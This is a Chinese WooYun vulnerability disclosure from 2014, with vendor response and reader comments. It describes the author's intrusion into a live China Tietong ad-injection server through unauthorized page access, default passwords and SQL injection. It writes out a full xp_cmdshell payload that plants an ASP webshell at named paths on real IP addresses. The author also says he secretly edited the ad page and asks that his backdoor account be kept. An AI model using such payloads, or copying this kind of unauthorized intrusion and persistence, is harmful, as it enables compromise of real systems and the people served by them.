当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067756

漏洞标题:中国铁通宽带广告投放系统存在严重安全问题(可推送挂马)

相关厂商:中国铁通集团有限公司

漏洞作者: Gosuto

提交时间:2014-07-07 19:15

修复时间:2014-08-21 19:16

公开时间:2014-08-21 19:16

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-07: 细节已通知厂商并且等待厂商处理中
2014-07-12: 厂商已经确认,细节仅向厂商公开
2014-07-22: 细节向核心白帽子及相关领域专家公开
2014-08-01: 细节向普通白帽子公开
2014-08-11: 细节向实习白帽子公开
2014-08-21: 细节向公众公开

简要描述:

最近被铁通恶意插入的广告搞的蛋疼 投诉无门 自己搞定

详细说明:

前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了
最近倒是不跳了 不管登陆什么网站 右下角总弹出一些风格一样的广告
F12看了一下广告图片的地址
http://61.235.249.195:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif
查下IP地址: 61.235.249.195辽宁省沈阳市 铁通
这不我大铁通的IP么 难道被劫持了?
百度之 果然是运营商劫持 顿时我就不开心了 本来前几天学长们毕业心情就不好 你还给我弹广告!
扫描了一下 找到两个后台地址:
http://61.235.249.195:808
http://61.235.249.195:6789

QQ截图20140707175756.png


简单试了一下弱口令 万能密码 无效...好失落...
丢到wwwsacn里 也没扫到什么用处较大的信息
不过根据以前的经验 猜到这类外观比较挫的网站安全性都比较差 就开始试能不能越权
越权漏洞:
http://61.235.249.195:6789/ManageFrame/left.aspx
不行
http://61.235.249.195:6789/ManageFrame/top.aspx
哎呦 这个可以!虽然用处不大...不过 总比啥都没有强!

QQ截图20140707180531.png


下载了帮助文档...发现原来这个系统还可以DNS劫持!

QQ截图20140707180748.png


之后又是一顿瞎猜 不过没什么收货了
不过那个个人设置吸引了我的注意力
http://61.235.249.195:6789/Common/UserManage/UserEditOneself.aspx
估计因为没参数 所以内容都是空白的
不过他的文件命名引起了我的兴趣 尝试修改了一下
http://61.235.249.195:6789/Common/UserManage/UserEdit.aspx
哎呦 路径被爆出来了

QQ截图20140707181319.png


换808那个后台再访问下
http://61.235.249.195:808/Common/UserManage/UserEdit.aspx
页面成功加载出来了

QQ截图20140707181436.png


然后 手欠的点了下取消 人品顿时爆发了
http://61.235.249.195:808/Common/UserManage/UserList.aspx

QQ截图20140707181545.png


这个用户有点少 我们换回6789

QQ截图20140707181658.png


我尝试添加了一个用户 成功了 不过登陆时提示未分配角色
但创建用户时的一句话引起了我的注意

QQ截图20140707181820.png


初始密码为1
越权页面:
http://61.235.249.195:6789/Common/UserManage/UserList.aspx
添加用户
http://61.235.249.195:6789/Common/Common_Role/RoleList.aspx
给予管理权限
密码弱口令:
随便找了个账号 就第一个吧 密码1 哦也 进去了~

QQ截图20140707182000.png


不过这都不是我的目的啊
我需要的是管理账号给自己的账号加白名单啊!然后我想到了注入!
注入点:
突然想到在http://61.235.249.195:6789/Common/UserManage/UserList.aspx
还有搜功能 会不会存在注入呢?来个引号试试!
人品再次爆发!

QQ截图20140707182629.png


然后发现竟然是sa权限 xp_cmdshell还没删除 发完这个漏洞我觉得我应该去买个彩票
路径也有了 直接写shell啊!
直接搜索cttjs';exec master..xp_cmdshell 'echo ^<%eval request(Chr(97))%^>>f:\浙江\IIOSManageWeb_主线08211\Common\UserManage\a.asp';--
写入一句话http://61.235.249.195:808/Common/UserManage/a.asp a

QQ截图20140707183014.png


推送挂马:
入侵期间发现广告的一些管理页面无法访问 做了IP限制?
不过这阻止不了有心的黑客们
翻了一下 找到了广告页面的文件 F:\IIIOS素材\Default.aspx
修改下 加点语句 神不知鬼不觉...

漏洞证明:

QQ截图20140707183142.png


QQ截图20140707183544.png


QQ截图20140707184138.png


QQ截图20140707184258.png


QQ截图20140707184357.png


QQ截图20140707184430.png


QQ截图20140707184442.png

修复方案:

白名单账号求不删!

版权声明:转载请注明来源 Gosuto@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-12 12:59

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国移动集团公司,由其后续下发工单给原铁通单位处置。按运行安全风险评分,rank 15

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-07 20:31 | 小小泥娃 ( 路人 | Rank:20 漏洞数:4 | 高二)

    哈哈哈哈哈,这个屌

  2. 2014-07-08 09:16 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)

    这个描述有意思

  3. 2014-07-08 11:31 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    同用铁通,被坑大了

  4. 2014-07-12 16:02 | 秀在我心 ( 路人 | Rank:0 漏洞数:1 | 走走停停)

    现在铁通和移动是一家

  5. 2014-08-12 15:19 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    学长毕业你伤心什么,你又不是妹子

  6. 2014-08-14 03:51 | Gosuto ( 实习白帽子 | Rank:40 漏洞数:5 | )

    @pandas 还有学姐啊!

  7. 2014-08-21 20:07 | 低调 ( 实习白帽子 | Rank:42 漏洞数:18 | .......)

    学长毕业你伤心什么,你又不是妹子

  8. 2014-08-22 17:06 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    学长毕业你伤心什么,你又不是妹子

  9. 2014-09-04 16:00 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    @latershow @低调 @pandas 也许要怀疑的是性取向